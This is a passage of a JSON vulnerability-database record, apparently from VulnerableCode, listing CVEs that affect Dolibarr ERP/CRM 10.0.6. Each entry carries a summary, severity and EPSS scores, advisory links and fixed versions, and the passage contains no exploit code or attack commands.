{"url":"http://public2.vulnerablecode.io/api/packages/16029?format=json","purl":"pkg:composer/dolibarr/dolibarr@10.0.6","type":"composer","namespace":"dolibarr","name":"dolibarr","version":"10.0.6","qualifiers":{},"subpath":"","is_vulnerable":true,"next_non_vulnerable_version":null,"latest_non_vulnerable_version":null,"affected_by_vulnerabilities":[{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/131826?format=json","vulnerability_id":"VCID-1qr4-xs72-e3a2","summary":"An issue in Dolibarr ERP CRM v.17.0.1 and before allows a remote privileged attacker to execute arbitrary code via a crafted command/script.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2023-38886","reference_id":"","reference_type":"","scores":[{"value":"0.50447","scoring_system":"epss","scoring_elements":"0.97913","published_at":"2026-06-12T12:55:00Z"},{"value":"0.50447","scoring_system":"epss","scoring_elements":"0.97905","published_at":"2026-06-11T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2023-38886"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2023-38886","reference_id":"","reference_type":"","scores":[{"value":"7.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2023-38886"},{"reference_url":"https://akerva.com/wp-content/uploads/2023/09/AKERVA_Security-Advisory_CVE-2023-38886_Dolibarr_RCE-1.pdf","reference_id":"AKERVA_Security-Advisory_CVE-2023-38886_Dolibarr_RCE-1.pdf","reference_type":"","scores":[{"value":"7.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-09-25T15:03:16Z/"}],"url":"https://akerva.com/wp-content/uploads/2023/09/AKERVA_Security-Advisory_CVE-2023-38886_Dolibarr_RCE-1.pdf"},{"reference_url":"http://dolibarr.com","reference_id":"dolibarr.com","reference_type":"","scores":[{"value":"7.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-09-25T15:03:16Z/"}],"url":"http://dolibarr.com"},{"reference_url":"https://github.com/advisories/GHSA-6773-rfjv-c54w","reference_id":"GHSA-6773-rfjv-c54w","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-6773-rfjv-c54w"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/379718?format=json","purl":"pkg:composer/dolibarr/dolibarr@17.0.1","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@17.0.1"}],"aliases":["CVE-2023-38886","GHSA-6773-rfjv-c54w"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-1qr4-xs72-e3a2"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/208666?format=json","vulnerability_id":"VCID-2fj8-fn7c-3ka1","summary":"Access Control vulnerability in Dolibarr","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2021-37517","reference_id":"","reference_type":"","scores":[{"value":"0.00356","scoring_system":"epss","scoring_elements":"0.58422","published_at":"2026-06-12T12:55:00Z"},{"value":"0.00356","scoring_system":"epss","scoring_elements":"0.58309","published_at":"2026-06-11T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2021-37517"},{"reference_url":"https://github.com/Dolibarr/dolibarr/commit/b57eb8284e830e30eefb26e3c5ede076ea24037c","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/Dolibarr/dolibarr/commit/b57eb8284e830e30eefb26e3c5ede076ea24037c"},{"reference_url":"https://github.com/Dolibarr/dolibarr/releases/tag/14.0.1","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/Dolibarr/dolibarr/releases/tag/14.0.1"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2021-37517","reference_id":"CVE-2021-37517","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2021-37517"},{"reference_url":"https://github.com/advisories/GHSA-xw7v-qrhc-jjg2","reference_id":"GHSA-xw7v-qrhc-jjg2","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-xw7v-qrhc-jjg2"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/19978?format=json","purl":"pkg:composer/dolibarr/dolibarr@14.0.1","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1qr4-xs72-e3a2"},{"vulnerability":"VCID-3ny3-rj44-ffgf"},{"vulnerability":"VCID-44tq-zhx1-8beb"},{"vulnerability":"VCID-4cfp-8g13-k7bd"},{"vulnerability":"VCID-5ykc-55w1-3ka4"},{"vulnerability":"VCID-5ynu-3t27-kuhq"},{"vulnerability":"VCID-6mqr-g619-dqbu"},{"vulnerability":"VCID-76rs-x78m-1fg6"},{"vulnerability":"VCID-79w7-szqt-wfeq"},{"vulnerability":"VCID-7g1w-ar9a-r7fb"},{"vulnerability":"VCID-83c2-jnk3-mbau"},{"vulnerability":"VCID-9f3a-9c5y-juf1"},{"vulnerability":"VCID-aeaq-1k3n-y7h1"},{"vulnerability":"VCID-az9a-3z2g-9kht"},{"vulnerability":"VCID-azy5-es2r-yyex"},{"vulnerability":"VCID-bthp-4km9-ekhz"},{"vulnerability":"VCID-cjmf-3m54-x3af"},{"vulnerability":"VCID-en1t-b8gx-6bgt"},{"vulnerability":"VCID-f3k5-kjua-mqes"},{"vulnerability":"VCID-h4pr-kj49-xfhb"},{"vulnerability":"VCID-k1fz-zvje-17ga"},{"vulnerability":"VCID-n6mk-74qs-6bfw"},{"vulnerability":"VCID-pn1n-de3e-uufv"},{"vulnerability":"VCID-qrcn-mrfx-xyb2"},{"vulnerability":"VCID-rjd3-a1ds-skdp"},{"vulnerability":"VCID-rtec-tutp-m3ep"},{"vulnerability":"VCID-spzz-de9a-g3gw"},{"vulnerability":"VCID-t393-s4zx-uyhs"},{"vulnerability":"VCID-tfxu-34ku-6uce"},{"vulnerability":"VCID-vxpt-gdg8-r7dc"},{"vulnerability":"VCID-wtcs-fcvg-dkgm"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@14.0.1"}],"aliases":["CVE-2021-37517","GHSA-xw7v-qrhc-jjg2"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-2fj8-fn7c-3ka1"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/322509?format=json","vulnerability_id":"VCID-2fk1-fu91-kfh1","summary":"","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2020-14201","reference_id":"","reference_type":"","scores":[{"value":"0.00146","scoring_system":"epss","scoring_elements":"0.34779","published_at":"2026-06-11T12:55:00Z"},{"value":"0.00146","scoring_system":"epss","scoring_elements":"0.34958","published_at":"2026-06-12T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2020-14201"},{"reference_url":"https://github.com/Dolibarr/dolibarr/blob/e76641c491e4105e9cb1ded6149771c621d822b5/ChangeLog#L2933","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/Dolibarr/dolibarr/blob/e76641c491e4105e9cb1ded6149771c621d822b5/ChangeLog#L2933"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2020-14201","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2020-14201"},{"reference_url":"https://www.wizlynxgroup.com/security-research-advisories/vuln/WLX-2020-011","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://www.wizlynxgroup.com/security-research-advisories/vuln/WLX-2020-011"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/384545?format=json","purl":"pkg:composer/dolibarr/dolibarr@11.0.5","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1qr4-xs72-e3a2"},{"vulnerability":"VCID-2fj8-fn7c-3ka1"},{"vulnerability":"VCID-3ny3-rj44-ffgf"},{"vulnerability":"VCID-44tq-zhx1-8beb"},{"vulnerability":"VCID-4cfp-8g13-k7bd"},{"vulnerability":"VCID-5ykc-55w1-3ka4"},{"vulnerability":"VCID-5ynu-3t27-kuhq"},{"vulnerability":"VCID-6mqr-g619-dqbu"},{"vulnerability":"VCID-76rs-x78m-1fg6"},{"vulnerability":"VCID-79w7-szqt-wfeq"},{"vulnerability":"VCID-7g1w-ar9a-r7fb"},{"vulnerability":"VCID-83c2-jnk3-mbau"},{"vulnerability":"VCID-9f3a-9c5y-juf1"},{"vulnerability":"VCID-aeaq-1k3n-y7h1"},{"vulnerability":"VCID-az9a-3z2g-9kht"},{"vulnerability":"VCID-azy5-es2r-yyex"},{"vulnerability":"VCID-bthp-4km9-ekhz"},{"vulnerability":"VCID-cjmf-3m54-x3af"},{"vulnerability":"VCID-en1t-b8gx-6bgt"},{"vulnerability":"VCID-f3k5-kjua-mqes"},{"vulnerability":"VCID-h4pr-kj49-xfhb"},{"vulnerability":"VCID-k1fz-zvje-17ga"},{"vulnerability":"VCID-kxze-6h5v-mqg4"},{"vulnerability":"VCID-mn75-tppb-dfd6"},{"vulnerability":"VCID-n6mk-74qs-6bfw"},{"vulnerability":"VCID-pn1n-de3e-uufv"},{"vulnerability":"VCID-qrcn-mrfx-xyb2"},{"vulnerability":"VCID-rjd3-a1ds-skdp"},{"vulnerability":"VCID-rtec-tutp-m3ep"},{"vulnerability":"VCID-snwr-xzcb-rfdr"},{"vulnerability":"VCID-spzz-de9a-g3gw"},{"vulnerability":"VCID-t393-s4zx-uyhs"},{"vulnerability":"VCID-tfxu-34ku-6uce"},{"vulnerability":"VCID-vxpt-gdg8-r7dc"},{"vulnerability":"VCID-wtcs-fcvg-dkgm"},{"vulnerability":"VCID-ww61-hqb4-m3db"},{"vulnerability":"VCID-zwts-bt1w-p7a4"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@11.0.5"}],"aliases":["CVE-2020-14201","GHSA-25h3-mw3p-w8r7"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-2fk1-fu91-kfh1"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/208326?format=json","vulnerability_id":"VCID-3ny3-rj44-ffgf","summary":"Code injection in dolibarr/dolibarr","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2022-0819","reference_id":"","reference_type":"","scores":[{"value":"0.01735","scoring_system":"epss","scoring_elements":"0.82941","published_at":"2026-06-12T12:55:00Z"},{"value":"0.01735","scoring_system":"epss","scoring_elements":"0.82879","published_at":"2026-06-11T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2022-0819"},{"reference_url":"https://github.com/dolibarr/dolibarr","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/dolibarr/dolibarr"},{"reference_url":"https://github.com/dolibarr/dolibarr/commit/2a48dd349e7de0d4a38e448b0d2ecbe25e968075","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/dolibarr/dolibarr/commit/2a48dd349e7de0d4a38e448b0d2ecbe25e968075"},{"reference_url":"https://huntr.dev/bounties/b03d4415-d4f9-48c8-9ae2-d3aa248027b5","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://huntr.dev/bounties/b03d4415-d4f9-48c8-9ae2-d3aa248027b5"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2022-0819","reference_id":"CVE-2022-0819","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2022-0819"},{"reference_url":"https://github.com/advisories/GHSA-42qm-c3cf-9wv2","reference_id":"GHSA-42qm-c3cf-9wv2","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-42qm-c3cf-9wv2"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/19557?format=json","purl":"pkg:composer/dolibarr/dolibarr@15.0.1","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1qr4-xs72-e3a2"},{"vulnerability":"VCID-44tq-zhx1-8beb"},{"vulnerability":"VCID-4cfp-8g13-k7bd"},{"vulnerability":"VCID-5ykc-55w1-3ka4"},{"vulnerability":"VCID-6mqr-g619-dqbu"},{"vulnerability":"VCID-76rs-x78m-1fg6"},{"vulnerability":"VCID-79w7-szqt-wfeq"},{"vulnerability":"VCID-7g1w-ar9a-r7fb"},{"vulnerability":"VCID-9f3a-9c5y-juf1"},{"vulnerability":"VCID-aeaq-1k3n-y7h1"},{"vulnerability":"VCID-az9a-3z2g-9kht"},{"vulnerability":"VCID-azy5-es2r-yyex"},{"vulnerability":"VCID-bthp-4km9-ekhz"},{"vulnerability":"VCID-cjmf-3m54-x3af"},{"vulnerability":"VCID-en1t-b8gx-6bgt"},{"vulnerability":"VCID-f3k5-kjua-mqes"},{"vulnerability":"VCID-h4pr-kj49-xfhb"},{"vulnerability":"VCID-pn1n-de3e-uufv"},{"vulnerability":"VCID-qrcn-mrfx-xyb2"},{"vulnerability":"VCID-rjd3-a1ds-skdp"},{"vulnerability":"VCID-rtec-tutp-m3ep"},{"vulnerability":"VCID-tfxu-34ku-6uce"},{"vulnerability":"VCID-wtcs-fcvg-dkgm"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@15.0.1"}],"aliases":["CVE-2022-0819","GHSA-42qm-c3cf-9wv2"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-3ny3-rj44-ffgf"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/71473?format=json","vulnerability_id":"VCID-44tq-zhx1-8beb","summary":"In Dolibarr ERP & CRM <= 22.0.4, PHP code detection and editing permission enforcement in the Website module is not applied consistently to all input parameters, allowing an authenticated user restricted to HTML/JavaScript editing to inject PHP code through unprotected inputs during website page creation.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-31018","reference_id":"","reference_type":"","scores":[{"value":"0.00049","scoring_system":"epss","scoring_elements":"0.1564","published_at":"2026-06-12T12:55:00Z"},{"value":"0.00049","scoring_system":"epss","scoring_elements":"0.15502","published_at":"2026-06-11T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-31018"},{"reference_url":"https://github.com/Dolibarr/dolibarr/commit/ba28d16da4cc0c221f49a878fecc8425501ceb96","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/Dolibarr/dolibarr/commit/ba28d16da4cc0c221f49a878fecc8425501ceb96"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-31018","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-31018"},{"reference_url":"http://dolibarr.com","reference_id":"dolibarr.com","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-21T15:30:39Z/"}],"url":"http://dolibarr.com"},{"reference_url":"https://github.com/advisories/GHSA-676v-wh57-p375","reference_id":"GHSA-676v-wh57-p375","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-676v-wh57-p375"},{"reference_url":"https://github.com/PhDg1410/CVE/blob/main/CVE-2026-31018/README.md","reference_id":"README.md","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-21T15:30:39Z/"}],"url":"https://github.com/PhDg1410/CVE/blob/main/CVE-2026-31018/README.md"}],"fixed_packages":[],"aliases":["CVE-2026-31018","GHSA-676v-wh57-p375"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-44tq-zhx1-8beb"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/47988?format=json","vulnerability_id":"VCID-4cfp-8g13-k7bd","summary":"Lack of sanitization during Installation Process in Dolibarr ERP CRM up to version 19.0.0 allows an attacker with adjacent access to the network to execute arbitrary code via a specifically crafted input.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2024-29477","reference_id":"","reference_type":"","scores":[{"value":"0.00165","scoring_system":"epss","scoring_elements":"0.3747","published_at":"2026-06-12T12:55:00Z"},{"value":"0.00165","scoring_system":"epss","scoring_elements":"0.37293","published_at":"2026-06-11T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2024-29477"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2024-29477","reference_id":"CVE-2024-29477","reference_type":"","scores":[{"value":"6.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:A/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2024-29477"},{"reference_url":"https://github.com/alexbsec/CVEs/blob/master/2024/CVE-2024-29477.md","reference_id":"CVE-2024-29477.md","reference_type":"","scores":[{"value":"6.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:A/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"},{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-04-03T14:57:17Z/"}],"url":"https://github.com/alexbsec/CVEs/blob/master/2024/CVE-2024-29477.md"},{"reference_url":"http://dolibarr.com","reference_id":"dolibarr.com","reference_type":"","scores":[{"value":"6.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:A/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"},{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-04-03T14:57:17Z/"}],"url":"http://dolibarr.com"},{"reference_url":"https://github.com/advisories/GHSA-p73x-rpgm-3v56","reference_id":"GHSA-p73x-rpgm-3v56","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-p73x-rpgm-3v56"}],"fixed_packages":[],"aliases":["CVE-2024-29477","GHSA-p73x-rpgm-3v56"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"7.9","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-4cfp-8g13-k7bd"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/322517?format=json","vulnerability_id":"VCID-54b5-vj66-ayeu","summary":"","references":[{"reference_url":"http://packetstormsecurity.com/files/161955/Dolibarr-ERP-CRM-11.0.4-Bypass-Code-Execution.html","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"http://packetstormsecurity.com/files/161955/Dolibarr-ERP-CRM-11.0.4-Bypass-Code-Execution.html"},{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2020-14209","reference_id":"","reference_type":"","scores":[{"value":"0.10166","scoring_system":"epss","scoring_elements":"0.93282","published_at":"2026-06-11T12:55:00Z"},{"value":"0.10166","scoring_system":"epss","scoring_elements":"0.93304","published_at":"2026-06-12T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2020-14209"},{"reference_url":"https://github.com/Dolibarr/dolibarr/releases/tag/11.0.5","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/Dolibarr/dolibarr/releases/tag/11.0.5"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2020-14209","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2020-14209"},{"reference_url":"https://www.wizlynxgroup.com/security-research-advisories/vuln/WLX-2020-012","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://www.wizlynxgroup.com/security-research-advisories/vuln/WLX-2020-012"},{"reference_url":"https://gitlab.com/exploit-database/exploitdb/-/blob/main/exploits/php/webapps/49711.py","reference_id":"CVE-2020-14209","reference_type":"exploit","scores":[],"url":"https://gitlab.com/exploit-database/exploitdb/-/blob/main/exploits/php/webapps/49711.py"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/384545?format=json","purl":"pkg:composer/dolibarr/dolibarr@11.0.5","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1qr4-xs72-e3a2"},{"vulnerability":"VCID-2fj8-fn7c-3ka1"},{"vulnerability":"VCID-3ny3-rj44-ffgf"},{"vulnerability":"VCID-44tq-zhx1-8beb"},{"vulnerability":"VCID-4cfp-8g13-k7bd"},{"vulnerability":"VCID-5ykc-55w1-3ka4"},{"vulnerability":"VCID-5ynu-3t27-kuhq"},{"vulnerability":"VCID-6mqr-g619-dqbu"},{"vulnerability":"VCID-76rs-x78m-1fg6"},{"vulnerability":"VCID-79w7-szqt-wfeq"},{"vulnerability":"VCID-7g1w-ar9a-r7fb"},{"vulnerability":"VCID-83c2-jnk3-mbau"},{"vulnerability":"VCID-9f3a-9c5y-juf1"},{"vulnerability":"VCID-aeaq-1k3n-y7h1"},{"vulnerability":"VCID-az9a-3z2g-9kht"},{"vulnerability":"VCID-azy5-es2r-yyex"},{"vulnerability":"VCID-bthp-4km9-ekhz"},{"vulnerability":"VCID-cjmf-3m54-x3af"},{"vulnerability":"VCID-en1t-b8gx-6bgt"},{"vulnerability":"VCID-f3k5-kjua-mqes"},{"vulnerability":"VCID-h4pr-kj49-xfhb"},{"vulnerability":"VCID-k1fz-zvje-17ga"},{"vulnerability":"VCID-kxze-6h5v-mqg4"},{"vulnerability":"VCID-mn75-tppb-dfd6"},{"vulnerability":"VCID-n6mk-74qs-6bfw"},{"vulnerability":"VCID-pn1n-de3e-uufv"},{"vulnerability":"VCID-qrcn-mrfx-xyb2"},{"vulnerability":"VCID-rjd3-a1ds-skdp"},{"vulnerability":"VCID-rtec-tutp-m3ep"},{"vulnerability":"VCID-snwr-xzcb-rfdr"},{"vulnerability":"VCID-spzz-de9a-g3gw"},{"vulnerability":"VCID-t393-s4zx-uyhs"},{"vulnerability":"VCID-tfxu-34ku-6uce"},{"vulnerability":"VCID-vxpt-gdg8-r7dc"},{"vulnerability":"VCID-wtcs-fcvg-dkgm"},{"vulnerability":"VCID-ww61-hqb4-m3db"},{"vulnerability":"VCID-zwts-bt1w-p7a4"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@11.0.5"}],"aliases":["CVE-2020-14209","GHSA-2gcp-xwxg-hqg3"],"risk_score":10.0,"exploitability":"2.0","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-54b5-vj66-ayeu"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/174028?format=json","vulnerability_id":"VCID-5ykc-55w1-3ka4","summary":"Dolibarr ERP & CRM <=15.0.3 is vulnerable to Eval injection. By default, any administrator can be added to the installation page of dolibarr, and if successfully added, malicious code can be inserted into the database and then execute it by eval.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2022-40871","reference_id":"","reference_type":"","scores":[{"value":"0.51559","scoring_system":"epss","scoring_elements":"0.97959","published_at":"2026-06-12T12:55:00Z"},{"value":"0.51559","scoring_system":"epss","scoring_elements":"0.97953","published_at":"2026-06-11T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2022-40871"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2022-40871","reference_id":"CVE-2022-40871","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2022-40871"},{"reference_url":"https://github.com/youncyb/dolibarr-rce","reference_id":"dolibarr-rce","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:T/P:M/B:A/M:M/D:T/2025-05-15T15:00:17Z/"}],"url":"https://github.com/youncyb/dolibarr-rce"},{"reference_url":"https://github.com/advisories/GHSA-7cm4-vmf2-8wf2","reference_id":"GHSA-7cm4-vmf2-8wf2","reference_type":"","scores":[{"value":"CRITICAL","scoring_system":